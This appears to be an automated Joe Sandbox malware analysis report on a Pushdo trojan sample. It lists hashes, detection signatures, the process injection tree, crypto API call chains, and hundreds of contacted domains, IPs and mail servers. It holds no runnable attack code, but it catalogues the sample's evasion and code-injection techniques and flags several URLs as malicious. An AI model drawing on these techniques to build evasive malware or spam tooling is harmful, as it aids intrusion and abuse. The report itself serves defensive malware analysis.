Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EwK95WVtzI.exe

Overview

General Information

Sample Name:EwK95WVtzI.exe
Original Sample Name:f96c1d0accec84ab6ddca3c0bafc6cbc.exe
Analysis ID:1322205
MD5:f96c1d0accec84ab6ddca3c0bafc6cbc
SHA1:cca064fe9f5583cb11a65e8958e06106a84ec965
SHA256:e5b9eabbf14369df477f37f566fc590f3869d82ee9884026f7fd6ed3aecd7d1d
Tags:32exetrojan
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Opens the same file many times (likely Sandbox evasion)
Contains functionality to inject code into remote processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses dynamic DNS services
Writes to foreign memory regions
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to detect sleep reduction / modifications
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Drops PE files to the user directory
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evasive API chain (may stop execution after accessing registry keys)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • EwK95WVtzI.exe (PID: 7304 cmdline: C:\Users\user\Desktop\EwK95WVtzI.exe MD5: F96C1D0ACCEC84AB6DDCA3C0BAFC6CBC)
    • svchost.exe (PID: 7876 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • svchost.exe (PID: 22928 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • pigalicapi.exe (PID: 7840 cmdline: "C:\Users\user\pigalicapi.exe" MD5: F96C1D0ACCEC84AB6DDCA3C0BAFC6CBC)
    • svchost.exe (PID: 8116 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • svchost.exe (PID: 5412 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • svchost.exe (PID: 2752 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • svchost.exe (PID: 820 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • svchost.exe (PID: 1144 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • svchost.exe (PID: 23052 cmdline: C:\Windows\system32\svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      SourceRuleDescriptionAuthorStrings
      4.2.pigalicapi.exe.a10000.2.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        0.2.EwK95WVtzI.exe.13f0000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          0.2.EwK95WVtzI.exe.13f0000.1.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            6.2.svchost.exe.4000000.5.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              14.2.svchost.exe.4000000.5.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                Timestamp:34.174.61.199192.168.2.380502052037771 10/09/23-15:51:00.831982
                SID:2037771
                Source Port:80
                Destination Port:50205
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3104.21.46.14849712802016867 10/09/23-15:50:02.895814
                SID:2016867
                Source Port:49712
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://gpthink.com/product/204.htmlAvira URL Cloud: Label: malware
                Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                Source: https://www.aevga.com/Avira URL Cloud: Label: malware
                Source: http://www.valselit.com/177-appartement-a-vendre-sigean-30378Avira URL Cloud: Label: malware
                Source: https://www.nelipak.nl/Avira URL Cloud: Label: malware
                Source: http://www.vitaindu.com/D3Avira URL Cloud: Label: phishing
                Source: http://www.aevga.com/Kw3Avira URL Cloud: Label: malware
                Source: C:\Users\user\pigalicapi.exeAvira: detection malicious, Label: HEUR/AGEN.1360695
                Source: EwK95WVtzI.exeReversingLabs: Detection: 21%
                Source: EwK95WVtzI.exeVirustotal: Detection: 30%Perma Link
                Source: EwK95WVtzI.exeAvira: detected
                Source: webways.comVirustotal: Detection: 8%Perma Link
                Source: www.tyrns.comVirustotal: Detection: 9%Perma Link
                Source: bd-style.comVirustotal: Detection: 7%Perma Link
                Source: usadig.comVirustotal: Detection: 8%Perma Link
                Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 21%
                Source: EwK95WVtzI.exeJoe Sandbox ML: detected
                Source: C:\Users\user\pigalicapi.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_013F8970
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_013F8800
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_013F8BB0
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F4BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,0_2_013F4BA0
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F47F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_013F47F0
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_013F8A70
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F4880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_013F4880
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_013F8CF0
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00A18800
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,4_2_00A18970
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00A18A70
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A14BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,4_2_00A14BA0
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00A18BB0
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A147F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,4_2_00A147F0
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A14880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,4_2_00A14880
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,4_2_00A18CF0
                Source: EwK95WVtzI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:49973 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:50005 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:49998 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:50027 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50076 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50070 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:50200 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.3:50212 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:61759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:54735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:59363 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:59493 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:59495 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:60304 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:60295 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:60293 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:60303 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:60305 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:60785 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.3:65531 version: TLS 1.2
                Source: EwK95WVtzI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050C473 FindFirstFileExW,0_2_0050C473
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056C473 FindFirstFileExW,4_2_0056C473

                Networking

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx4.burnserver.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: troygroup.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: optilink.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.204.160 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns2.webunlimited.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: aspmx3.googlemail.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: foodallergy-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 1thecity.biz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns2.centrum.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: srbattery.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.74.141 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: karan-carpets.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: comstarauto.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp-agent12.mountsinai.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: iclud.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: polishprincess.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nscable.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cei.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: netoverdrive-com-au.p10.mxthunder.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccamatil.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: memorialhermann.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: slochamber.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visimax-com-au.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: orcon.net.nz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivienvitolo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail3.ocel.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rxlps-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: immobiliarepunto.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cargill.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: travelpack.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rustici.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: otegroup.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: victoriamansion.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: adler-lacke.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: productivitymind.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcl-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns6444.hostgator.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa.inbound.socket.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ghnt.nhs.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: virusadv.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: karamian.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bee-s.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.186 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: syntrans.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns3.combell.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sabrain.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dessy.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.wido.info
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: unav.es
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: antiochgolfclub.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hasslo.ns.cloudflare.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: chpnet.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ebtnet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmial.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bt.pf
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: em4.mainnetmail.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.zoho.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sbcglobqal.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cabonet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: zeiss.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bvcaa.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.selectel.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visiorisk.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hostcalls.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx1.orcon.net.nz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: d160221b.ess.barracudanetworks.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.medius.si
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmai.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.34 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vizi0n.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: prodigy.net.mx
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mta-gw.infomaniak.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: peoplescom-net.mx.av-mx.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bedmod.co.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vipmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: send.aweber.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fallsburgny.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bpai.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: newmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftc-i.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.40 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: igexsolutions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.culver.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: kelon.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.46.30.77 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: em4.rejecthost.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: blog-galaxy.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: asl.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.reg.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: slns1.namespro.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: minglebox.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: botters.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxpro02.yovocloud.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: voiaj.md
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fallsburgny.com.1.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.owsports.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pat.ns.cloudflare.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ovam.be
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: uoit.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.135.11 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: inbound-smtp.us-east-1.amazonaws.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymaio.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dessy.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 2980.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nv.ccsd.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fastleader.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dead.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.146.154 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.servconfig.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.leonet.it
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gaimil.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: me-cfs.info
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: naui.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: univ-paris-diderot.fr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 207.180.198.201 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dowser.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lancemore.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ginospizza.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rightstartmortgage-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1-proddns.glbdns.o365filtering.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: minock.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: icci.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: personeltedarik.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.122.205 80
